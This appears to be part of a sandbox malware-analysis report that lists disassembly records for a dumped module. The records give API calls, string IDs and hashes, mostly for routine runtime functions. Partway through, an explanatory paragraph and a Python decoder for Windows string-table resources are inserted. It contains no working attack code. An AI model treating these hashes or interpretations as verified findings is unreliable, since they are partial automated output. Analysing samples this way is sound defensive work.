                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                      • String ID: %.0Lf
                                                                      • API String ID: 1487807907-1402515088
                                                                      • Opcode ID: c1e2ab7ad512c549851f5196737ed30cfbf4074dd2cfc5c09a4796afa6fa0566
                                                                      • Instruction ID: 126a9db83fb89e894c57876ebceca1d0e2d456081288aab13bf483debac0ba01
                                                                      • Opcode Fuzzy Hash: c1e2ab7ad512c549851f5196737ed30cfbf4074dd2cfc5c09a4796afa6fa0566
                                                                      • Instruction Fuzzy Hash: FA516971D00258ABCF0ADFE4D884ADDBBB5FB48300F20496AE506AB2A5DB399915CF54
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: \\?\$\\?\UNC\
                                                                      • API String ID: 0-3019864461
                                                                      • Opcode ID: 3410fb7e5c02815c6b9d471fdb891575549d34ca5373fb8090a12a58c70c33b0
                                                                      • Instruction ID: c303163d6aef5aff252cc87940dc909ae52af570e469979e4c879068935f6435
                                                                      • Opcode Fuzzy Hash: 3410fb7e5c02815c6b9d471fdb891575549d34ca5373fb8090a12a58c70c33b0
                                                                      • Instruction Fuzzy Hash: 6851B170A103549BDB25CF66C885BAEB7B5FF98314F10461FE801B72C1DBB5A988CB94
                                                                      APIs
                                                                      • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 003E3DA3
                                                                      • CertGetNameStringW.CRYPT32(000000FF,00000004,00000000,00000000,00000010,000000FF), ref: 003E3E3F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: CertNameString
                                                                      • String ID: x->
                                                                      • API String ID: 149855834-1156097982
                                                                      • Opcode ID: 602a3d4b63ed5ed9df2eeb6001223afef9dd465bd92d89cc1f09a06fe7dd77b8
                                                                      • Instruction ID: 5ff08edff01ca0a0c66585508f7bb9715e8645227ae03257903b8a50a4399d76
                                                                      • Opcode Fuzzy Hash: 602a3d4b63ed5ed9df2eeb6001223afef9dd465bd92d89cc1f09a06fe7dd77b8
                                                                      • Instruction Fuzzy Hash: 5E41CD71A00656AFD715CF69CC05BAAFBB4FF84314F20432AE915E73D0E7B1AA408B94
                                                                      APIs
                                                                      • EncodePointer.KERNEL32(00000000,?), ref: 0040B5F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: EncodePointer
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 2118026453-2084237596
                                                                      • Opcode ID: 465421d766cc6bd8e83d9380d6e757eedfee4f80a3e5f489f8e9020ced571981
                                                                      • Instruction ID: 7224985a4688261aadbb58a2464900904f747aef9d0e6cbcd85683d5bc8b0415
                                                                      • Opcode Fuzzy Hash: 465421d766cc6bd8e83d9380d6e757eedfee4f80a3e5f489f8e9020ced571981
                                                                      • Instruction Fuzzy Hash: 55419C71900209AFCF15CF98CD81AEEBBB5FF48304F18846AF904772A1D33A9950DB99
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 00402183
                                                                        • Part of subcall function 003F780A: __EH_prolog3.LIBCMT ref: 003F7811
                                                                        • Part of subcall function 003F780A: std::_Lockit::_Lockit.LIBCPMT ref: 003F781B
                                                                        • Part of subcall function 003F780A: std::_Lockit::~_Lockit.LIBCPMT ref: 003F788C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$H_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                      • String ID: %.0Lf$0123456789-
                                                                      • API String ID: 2728201062-3094241602
                                                                      • Opcode ID: 833bf8b7d6fada808221c545aeab9ec71adb9633ccf9e83b11d61e4cdaa06672
                                                                      • Instruction ID: 71c1ff8caee5dfb2d588a9cf2ddbd2f5e8fbf360dae938069775ca6fdb8d445d
                                                                      • Opcode Fuzzy Hash: 833bf8b7d6fada808221c545aeab9ec71adb9633ccf9e83b11d61e4cdaa06672
                                                                      • Instruction Fuzzy Hash: 0F414931A00218DFCF06EFD4DA859EEBBB5BF09310F10016EE911BB2A1DB749956CB59
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 00402467
                                                                        • Part of subcall function 003EB500: std::_Lockit::_Lockit.LIBCPMT ref: 003EB52D
                                                                        • Part of subcall function 003EB500: std::_Lockit::_Lockit.LIBCPMT ref: 003EB550
                                                                        • Part of subcall function 003EB500: std::_Lockit::~_Lockit.LIBCPMT ref: 003EB578
                                                                        • Part of subcall function 003EB500: std::_Lockit::~_Lockit.LIBCPMT ref: 003EB617
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
                                                                      • String ID: 0123456789-$0123456789-
                                                                      • API String ID: 2088892359-2494171821
                                                                      • Opcode ID: ee5f5b564c11a4ecd03d838e02d641d9e53ef7edf6e18e8dab23b445b996c6d6
                                                                      • Instruction ID: 13119eb9805afc73811e23f7f20f561ad1d42578541938222ab4eb2a32eae7c1
                                                                      • Opcode Fuzzy Hash: ee5f5b564c11a4ecd03d838e02d641d9e53ef7edf6e18e8dab23b445b996c6d6
                                                                      • Instruction Fuzzy Hash: 5A418E31900268DFCF06DF98DA859EEBBB5FF09310F10016AF905BB291DB749955CB68
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 004064E2
                                                                        • Part of subcall function 003EC590: std::_Lockit::_Lockit.LIBCPMT ref: 003EC5BD
                                                                        • Part of subcall function 003EC590: std::_Lockit::_Lockit.LIBCPMT ref: 003EC5E0
                                                                        • Part of subcall function 003EC590: std::_Lockit::~_Lockit.LIBCPMT ref: 003EC608
                                                                        • Part of subcall function 003EC590: std::_Lockit::~_Lockit.LIBCPMT ref: 003EC6A7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
                                                                      • String ID: 0123456789-$0123456789-
                                                                      • API String ID: 2088892359-2494171821
                                                                      • Opcode ID: 8d26a3cf5e1c4af72b948d41b563e7ef4a13136e840ad8967e5df9098b238ab3
                                                                      • Instruction ID: e557e5e0285226c9d1aac740fd593463a49a7ed812537391b0890f486b15f650
                                                                      • Opcode Fuzzy Hash: 8d26a3cf5e1c4af72b948d41b563e7ef4a13136e840ad8967e5df9098b238ab3
                                                                      • Instruction Fuzzy Hash: 86415E31900219EFCF06DFA5E9819DE7BB5EF09310F10446EF412BB291DB399A16CB59
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog3___cftoe
                                                                      • String ID: !%x
                                                                      • API String ID: 855520168-1893981228
                                                                      • Opcode ID: f9bd6110b4bfdc9b5ee6fb246937858efea6bd65962bb48b8850d3556bde3a9b
                                                                      • Instruction ID: 33f3391d9c9cd7ae376f9d37d11402412f7a8483cd7f17db3b5b784248e700eb
                                                                      • Opcode Fuzzy Hash: f9bd6110b4bfdc9b5ee6fb246937858efea6bd65962bb48b8850d3556bde3a9b
                                                                      • Instruction Fuzzy Hash: C3414771A11249EFDF05EFA8D8409EEBBB1BF08304F04842AF956BB382D7349911CB65
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog3___cftoe
                                                                      • String ID: !%x
                                                                      • API String ID: 855520168-1893981228
                                                                      • Opcode ID: fb785ae3813e30c0b2c36c383cac1c0c213704675def089ea741c595e6d21f17
                                                                      • Instruction ID: d0c5e50d023f0615ad5b708951e7708ad4d137762138b31e9c91a8e946496749
                                                                      • Opcode Fuzzy Hash: fb785ae3813e30c0b2c36c383cac1c0c213704675def089ea741c595e6d21f17
                                                                      • Instruction Fuzzy Hash: 0D314D71A01209EBDF04DFA4DA859EEB7B2FF48304F10442AF905BB291E7789E05CB94
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: _swprintf
                                                                      • String ID: %$+
                                                                      • API String ID: 589789837-2626897407
                                                                      • Opcode ID: be6c15f7fac2e1c8013b542196b8bfcd6a159c18b5384d59069d4ead3d7165cc
                                                                      • Instruction ID: 2784418314ca2aeb459339fc345e5d071b1df3815e4c4bbd72346d9ab014381b
                                                                      • Opcode Fuzzy Hash: be6c15f7fac2e1c8013b542196b8bfcd6a159c18b5384d59069d4ead3d7165cc
                                                                      • Instruction Fuzzy Hash: D021E7711083849FD712CF15C859B9BBBE9AF89304F04895DF99857292D734D918C7E3
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: _swprintf
                                                                      • String ID: %$+
                                                                      • API String ID: 589789837-2626897407
                                                                      • Opcode ID: 94935c36b3218fc9b29cc42dc8c5b403234523578bd3a07a76b0f9e74ddbffdd
                                                                      • Instruction ID: 4f147a49adc0d90e8dc1a5ec851bfdf6cfb980fe11851c75f28564e2baa2bf7a
                                                                      • Opcode Fuzzy Hash: 94935c36b3218fc9b29cc42dc8c5b403234523578bd3a07a76b0f9e74ddbffdd
                                                                      • Instruction Fuzzy Hash: 3321D6752083859FD712CF15C845B9BBBE9EBC5300F14891DF99497292C734D918C7A7
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: _swprintf
                                                                      • String ID: %$+
                                                                      • API String ID: 589789837-2626897407
                                                                      • Opcode ID: 54167e148ce4377fc763e241f6e8f6bc7bc88d8ce4b097f71b0deaedac52fd1a
                                                                      • Instruction ID: 2d41f47c781006cfad572a0bc12821e449f2853d36e75200a7f7f24dbcad1fbd
                                                                      • Opcode Fuzzy Hash: 54167e148ce4377fc763e241f6e8f6bc7bc88d8ce4b097f71b0deaedac52fd1a
                                                                      • Instruction Fuzzy Hash: 9C21C4712083859FE712CF15C845B9BBBE9EBC5300F14891DF99497292C734D918C7A7
                                                                      APIs
                                                                        • Part of subcall function 003F1EC4: EnterCriticalSection.KERNEL32(00444844,?,?,?,003E1CE7,00000000,755CD0F6,?,?,?,?,-00000010,00429340,000000FF,?,003E202C), ref: 003F1ECF
                                                                        • Part of subcall function 003F1EC4: LeaveCriticalSection.KERNEL32(00444844,?,?,003E1CE7,00000000,755CD0F6,?,?,?,?,-00000010,00429340,000000FF,?,003E202C), ref: 003F1EFB
                                                                      • FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,755CD0F6,?,?,?,?,-00000010,00429340,000000FF,?,003E202C), ref: 003E1D06
                                                                        • Part of subcall function 003E1D70: LoadResource.KERNEL32(00000000,00000000,755CD0F6,00000001,00000000,?,00000000,00429360,000000FF,?,003E1D1C,00000010,?,?,?,-00000010), ref: 003E1D9B
                                                                        • Part of subcall function 003E1D70: LockResource.KERNEL32(00000000,?,003E1D1C,00000010,?,?,?,-00000010,00429340,000000FF,?,003E202C,?,00000000,0042938D,000000FF), ref: 003E1DA6
                                                                        • Part of subcall function 003E1D70: SizeofResource.KERNEL32(00000000,00000000,?,003E1D1C,00000010,?,?,?,-00000010,00429340,000000FF,?,003E202C,?,00000000,0042938D), ref: 003E1DB4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$CriticalSection$EnterFindLeaveLoadLockSizeof
                                                                      • String ID: 0HD$0HD
                                                                      • API String ID: 529824247-962433497
                                                                      • Opcode ID: c826a2ef00076d956dc6b6c05653c5ff8fdcb41d1c55be4b1da4cc585d71d30a
                                                                      • Instruction ID: 5e3b3e210412a5747552dcecf7cff052c209c71dac80a2767c6752b56c77f97a
                                                                      • Opcode Fuzzy Hash: c826a2ef00076d956dc6b6c05653c5ff8fdcb41d1c55be4b1da4cc585d71d30a
                                                                      • Instruction Fuzzy Hash: 80110A36F046686BE7268B59AC41B7BF3D8E789B64F00023EED06D73C0DB359C008294
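                                                                      The record above calls FindResourceExW with lpType = 6, which is RT_STRING, bracketed by the critical-section enter/leave of a subcall and followed by LoadResource, LockResource and SizeofResource. That is the shape of string-table loading (the ATL CString::LoadString path through CAtlBaseModule), not RCDATA payload extraction, so the check a triager wants here is to decode the sample's RT_STRING blocks and read what they contain. The decoder below is an added example, not code from the report or from the sample; it assumes the caller has already extracted one RT_STRING block's raw bytes (for instance with a PE resource walker or the pefile library), and the sample block built in the test is constructed for illustration using two literals visible elsewhere in this report.

```python
import struct

RT_STRING = 6  # resource type id seen as lpType in the FindResourceExW call

# Win32 string tables are stored in blocks of 16 strings. The block's resource
# name (an integer) is derived from the string id; the block itself is 16
# consecutive entries, each a 16-bit length in UTF-16 code units followed by
# that many code units with no terminator. Missing ids are zero-length entries.

def block_id_for_string(string_id: int) -> int:
    """Resource name (block id) that holds the given string id."""
    return (string_id // 16) + 1


def decode_string_table_block(block_id: int, data: bytes) -> dict:
    """Decode one RT_STRING block into {string_id: text}.

    Stops cleanly on a block that ends early (fewer than 16 entries present)
    and rejects an entry whose declared length runs past the buffer, so a
    corrupt or hostile resource cannot make the decoder read out of bounds.
    """
    base = (block_id - 1) * 16
    strings = {}
    pos = 0
    for index in range(16):
        if pos + 2 > len(data):
            break  # truncated block: no more entries
        (nchars,) = struct.unpack_from("<H", data, pos)
        pos += 2
        end = pos + nchars * 2
        if end > len(data):
            raise ValueError(
                f"entry {index} of block {block_id} declares {nchars} chars past end of data"
            )
        if nchars:
            strings[base + index] = data[pos:end].decode("utf-16-le")
        pos = end
    return strings


def encode_string_table_block(block_id: int, strings: dict) -> bytes:
    """Inverse of decode_string_table_block; used here to build test input."""
    base = (block_id - 1) * 16
    out = bytearray()
    for index in range(16):
        encoded = strings.get(base + index, "").encode("utf-16-le")
        out += struct.pack("<H", len(encoded) // 2) + encoded
    return bytes(out)


if __name__ == "__main__":
    # Constructed sample block: ids 33 and 40 both live in block 3.
    sample = encode_string_table_block(3, {33: "Invalid SID", 40: "bad locale name"})
    for sid, text in sorted(decode_string_table_block(3, sample).items()):
        print(sid, repr(text))
```

When reading a dumped module such as the 0x3E0000 image referenced in these records, run the decoder over every RT_STRING block the resource walker returns; string ids map back to the block via block_id_for_string, which is how LoadString locates them at run time.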
                                                                      APIs
                                                                      • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 003E8116
                                                                      • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,755CD0F6), ref: 003E8185
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ConvertFreeLocalString
                                                                      • String ID: Invalid SID
                                                                      • API String ID: 3201929900-130637731
                                                                      • Opcode ID: cd45d6eb68f3aa4eb78dce1ae16e3bc8864bc971d69c7c04a52d021ad2e2db05
                                                                      • Instruction ID: 923b0d62c6cfa688091d933066c5909c7c67032bf508f759c9212ee1d4876feb
                                                                      • Opcode Fuzzy Hash: cd45d6eb68f3aa4eb78dce1ae16e3bc8864bc971d69c7c04a52d021ad2e2db05
                                                                      • Instruction Fuzzy Hash: 0921AE74E003559BDB11CF59C819BAFFBB8FF44B04F10465EE806A7280DBB56A458BD4
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EC16B
                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003EC1CE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 3988782225-1405518554
                                                                      • Opcode ID: f463ef576e84d112891757f922c9c2b36c2cdd430429a67c94817f48f58ecef6
                                                                      • Instruction ID: f8ec1e89ea809f97985ff8c8f878181a29332c9f76ae44f42e289d371eb0735d
                                                                      • Opcode Fuzzy Hash: f463ef576e84d112891757f922c9c2b36c2cdd430429a67c94817f48f58ecef6
                                                                      • Instruction Fuzzy Hash: 18210270805B88DED721CF68C90474BBFF4EF15710F10869EE48597781D7B5AA04CBA5
                                                                      APIs
                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407BCF
                                                                      • ___raise_securityfailure.LIBCMT ref: 00407CB7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                      • String ID: @KD
                                                                      • API String ID: 3761405300-3991357333
                                                                      • Opcode ID: c38939752e0d4be7c6b1205a8d298de7c3d848d17758939ef1097b999e876c27
                                                                      • Instruction ID: 1f17eced9f5812614e7adda13fed68acdab163dfb9d39c39aa5769c81e89359d
                                                                      • Opcode Fuzzy Hash: c38939752e0d4be7c6b1205a8d298de7c3d848d17758939ef1097b999e876c27
                                                                      • Instruction Fuzzy Hash: 0D21F8BC9022049BD324CF59F996704BBF4FB8A314F16453AE5088B7A1DBB4A940CF4D
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog3_
                                                                      • String ID: false$true
                                                                      • API String ID: 2427045233-2658103896
                                                                      • Opcode ID: cce215aac40a3fbe992eee3a5e567ac59de4d4843a1f51eda05c3ce4199fca96
                                                                      • Instruction ID: 59f3761fb8cde771915dd0fdb31636bd58853e36b821439e9ca4eb9d99018b23
                                                                      • Opcode Fuzzy Hash: cce215aac40a3fbe992eee3a5e567ac59de4d4843a1f51eda05c3ce4199fca96
                                                                      • Instruction Fuzzy Hash: CA11D671D00745AEC722EFB4D452B9AB7F4AF09300F00852FE2A59B691DB74E504CB94
                                                                      APIs
                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407CD5
                                                                      • ___raise_securityfailure.LIBCMT ref: 00407D92
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                      • String ID: @KD
                                                                      • API String ID: 3761405300-3991357333
                                                                      • Opcode ID: 4271bf4b32d7b27705e880f8399d6309bc021035a6771f615ba5f9efb5161434
                                                                      • Instruction ID: 0d749429659299675fda779341c263b96bb80122f855122d18f36cd97431094a
